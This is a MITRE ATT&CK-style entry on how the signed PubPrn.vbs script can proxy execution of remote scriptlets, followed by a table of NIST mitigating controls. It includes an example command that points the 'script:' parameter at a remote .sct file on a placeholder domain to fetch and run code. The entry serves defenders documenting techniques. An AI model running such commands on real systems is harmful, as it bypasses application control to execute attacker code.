Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via <code>Cscript.exe</code>. For example, the following code publishes a printer within the specified domain: <code>cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com</code>.(Citation: pubprn)
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
View in MITRE ATT&CK®| Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name |
|---|---|---|---|---|
| CM-2 | Baseline Configuration | Protects | T1216.001 | PubPrn |
| CM-6 | Configuration Settings | Protects | T1216.001 | PubPrn |
| CM-7 | Least Functionality | Protects | T1216.001 | PubPrn |
| SI-10 | Information Input Validation | Protects | T1216.001 | PubPrn |
| SI-4 | System Monitoring | Protects | T1216.001 | PubPrn |
| SI-7 | Software, Firmware, and Information Integrity | Protects | T1216.001 | PubPrn |
| action.hacking.variety.Abuse of functionality | Abuse of functionality. | related-to | T1216.001 | Signed Script Proxy Execution: PubPrn |